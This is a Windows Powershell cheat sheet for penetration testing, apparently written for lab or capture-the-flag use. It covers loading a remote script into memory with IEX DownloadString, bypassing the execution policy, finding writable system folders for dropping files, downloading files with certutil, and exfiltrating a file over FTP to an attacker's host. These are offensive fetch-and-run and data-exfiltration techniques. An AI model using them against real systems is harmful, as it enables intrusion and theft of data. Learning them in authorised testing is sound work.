# CLI Tips

## Powershell

### Load Powershell Module Over HTTP

Pull a module straight into memory and execute it without writing it to disk:

```
IEX (New-Object Net.WebClient).DownloadString('http://example.com/some_module.ps1')
```

### Bypass Powershell Execution Policy

The execution policy decides whether Powershell will run script files (`.ps1`) at all; it is a safety catch, not a security boundary. With the default `Restricted` policy an external script refuses to run until you bypass it. Start Powershell with the policy bypassed:

```
powershell.exe -ExecutionPolicy Bypass
```
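The same bypass from inside an already-running session, as an added example that is not part of the original page. `script.ps1` is a placeholder script name. None of these change the persistent machine or user policy; a policy enforced by Group Policy (`MachinePolicy` / `UserPolicy` in the first command's output) still wins over all of them.

```powershell
# Added example: get past the execution policy without changing the
# machine-wide setting. .\script.ps1 is a hypothetical script name.

# 1. Show the effective policy and every scope that sets one
#    (MachinePolicy/UserPolicy come from GPO and cannot be overridden here).
Get-ExecutionPolicy -List

# 2. Override for this process only: no admin rights needed, nothing persists.
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force
.\script.ps1

# 3. Spawn a child powershell that runs one script under Bypass and exits.
powershell.exe -NoProfile -ExecutionPolicy Bypass -File .\script.ps1

# 4. The policy governs script *files*, not commands, so reading the file and
#    handing its text to Invoke-Expression works even under Restricted.
IEX (Get-Content -Raw .\script.ps1)
```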

### Switch to 64-bit Powershell from 32-bit

If you're on a 64-bit machine but running a 32-bit Powershell, [some things might not work, such as autologon discovery](https://youtu.be/Cz6vQvGGiuc?t=2491).

* Check in powershell:
  * `[environment]::Is64BitOperatingSystem`
  * `[environment]::Is64BitProcess`
* Access 64-bit Powershell at:
  * `C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe`
  * This path exists for 32-bit applications **even if you can't see it** from Explorer or a 64-bit shell, [because it is virtual](https://www.samlogic.net/articles/sysnative-folder-64-bit-windows.htm): the file system redirector maps it to the real `System32` only for 32-bit processes.
  * Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just `powershell.exe` with no path.
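The check-and-relaunch logic above as one script, an added example that is not part of the original page. `relaunch64.ps1` is a hypothetical file name; the script re-executes itself through the SysNative path when it detects a 32-bit host on a 64-bit OS, and otherwise carries on.

```powershell
# Added example: save as relaunch64.ps1 (hypothetical name) and run it from any
# Powershell. In a 32-bit process on a 64-bit OS it relaunches itself via the
# 64-bit powershell.exe and exits, so the payload below runs exactly once.

if ([Environment]::Is64BitOperatingSystem -and -not [Environment]::Is64BitProcess) {
    # SysNative is a virtual alias that only resolves for 32-bit processes;
    # it points at the real 64-bit System32 that WOW64 otherwise hides.
    $ps64 = Join-Path $env:windir 'SysNative\WindowsPowerShell\v1.0\powershell.exe'
    if (Test-Path $ps64) {
        Write-Host "32-bit host detected, relaunching with $ps64"
        & $ps64 -NoProfile -ExecutionPolicy Bypass -File $PSCommandPath @args
        exit $LASTEXITCODE
    }
    Write-Warning 'SysNative path not found; continuing in the 32-bit process'
}

# Everything from here runs in 64-bit Powershell (or the relaunch was impossible).
"Is64BitProcess : $([Environment]::Is64BitProcess)"
"PID            : $PID"
"Host path      : $((Get-Process -Id $PID).Path)"
```

`$PSCommandPath` requires Powershell 3.0 or later; on the 2.0 hosts that still exist on old servers, substitute `$MyInvocation.MyCommand.Path`.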

### View Hidden Files

```
Get-ChildItem -Force
```

### Running Powershell commands from CMD

You can do it like this; in a non-interactive shell (a reverse shell, for example) you may need to press Enter once more before the output appears.

```
powershell -command "whoami"
```

### Writable Folders

Folders that standard users can write to on a default Windows install (from [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)), useful for dropping files when the usual user-writable locations are locked down:

* C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
* C:\Windows\System32\spool\drivers\color
* C:\Windows\Tasks
* C:\Windows\tracing
* C:\Windows\Temp
* C:\Users\Public
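Rather than trusting the list, probe each folder under the current token, as an added example that is not part of the original page. Creating and deleting a throwaway file exercises the real ACL and integrity-level checks, which reading the DACL alone does not; the folder list and the `Test-WritableFolder` function name are this example's own.

```powershell
# Added example: test write access to the candidate folders by creating and
# deleting a zero-byte file as the current user.

$candidates = @(
    "$env:windir\System32\Microsoft\Crypto\RSA\MachineKeys",
    "$env:windir\System32\spool\drivers\color",
    "$env:windir\Tasks",
    "$env:windir\tracing",
    "$env:windir\Temp",
    "$env:SystemDrive\Users\Public"
)

function Test-WritableFolder {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return 'missing' }
    # Random name so two probes never collide and nothing useful is overwritten.
    $probe = Join-Path $Path ("probe-{0}.tmp" -f [guid]::NewGuid())
    try {
        # -ErrorAction Stop turns the access-denied error into a catchable exception.
        New-Item -ItemType File -Path $probe -ErrorAction Stop | Out-Null
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return 'writable'
    } catch {
        if ($_.Exception -is [System.UnauthorizedAccessException]) { return 'denied' }
        return "error: $($_.Exception.Message)"
    }
}

$candidates | ForEach-Object {
    [pscustomobject]@{ Path = $_; Result = (Test-WritableFolder $_) }
} | Format-Table -AutoSize
```

Writable does not mean executable: AppLocker or WDAC rules may still block running a binary from these paths, and in `MachineKeys` you can create files but not remove ones you do not own.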

### Transferring Files

See also: [Transferring Files (offsecnewbie)](https://guide.offsecnewbie.com/transferring-files)

#### HTTP Download

Start an HTTP server on your Linux machine (serves the current directory on port 8000 by default):

```
python3 -m http.server
```

Download a file with `curl.exe` (ships with Windows 10 1803 and later). Use the `.exe` name: in Powershell the bare word `curl` is an alias for `Invoke-WebRequest`, which does not understand curl's switches.

```
curl.exe -o file.exe http://IP:PORT/file.exe
```

Download a file using certutil (`-split` makes it write the file to disk, `-f` overwrites an existing one). This is a well-known LOLBin and is heavily signatured by AV and EDR:

```
certutil.exe -urlcache -split -f http://IP:PORT/path/filename.exe filename.exe
```
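When neither `curl.exe` nor `certutil` is available or allowed, Powershell's own HTTP client will do. The following is an added example, not part of the original page; `http://IP:PORT` and `file.exe` are placeholders as elsewhere in this section, and the hash check assumes you compare against `sha256sum file.exe` run on the serving side.

```powershell
# Added example: download with .NET/Powershell built-ins and confirm the file
# arrived intact. URL, file name and destination are placeholders.

$url  = 'http://IP:PORT/file.exe'
$dest = Join-Path $env:TEMP 'file.exe'

try {
    # WebClient exists on every Powershell version and streams straight to disk.
    (New-Object Net.WebClient).DownloadFile($url, $dest)
} catch {
    # Fallback to the cmdlet; -UseBasicParsing skips the IE DOM parser on 5.1,
    # which fails on hosts where Internet Explorer's first-run setup never ran.
    Invoke-WebRequest -Uri $url -OutFile $dest -UseBasicParsing
}

# Compare size and SHA-256 with the copy on the serving machine before running it.
Get-Item $dest | Select-Object Name, Length
(Get-FileHash -Algorithm SHA256 -Path $dest).Hash
```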

#### FTP Upload

Start an FTP server on your linux machine:&#x20;

```
pip3 install pyftpdlib 
python3 -m pyftpdlib --username myuser --password mypass --write
```

If you don't specify a username and password, you can log in as `anonymous` with no password. pyftpdlib listens on port 2121 by default, which is why the URL below uses that port.

```
# Local file to exfiltrate and the FTP target (user:pass embedded in the URL)
$File = "C:\Users\svc-alfresco\Documents\winpeas.txt";
$ftp = "ftp://myuser:mypass@10.10.14.141:2121/winpeas.txt";
# WebClient.UploadFile speaks FTP when handed an ftp:// URI
$webclient = New-Object -TypeName System.Net.WebClient;
$uri = New-Object -TypeName System.Uri -ArgumentList $ftp;
$webclient.UploadFile($uri, $File);
```
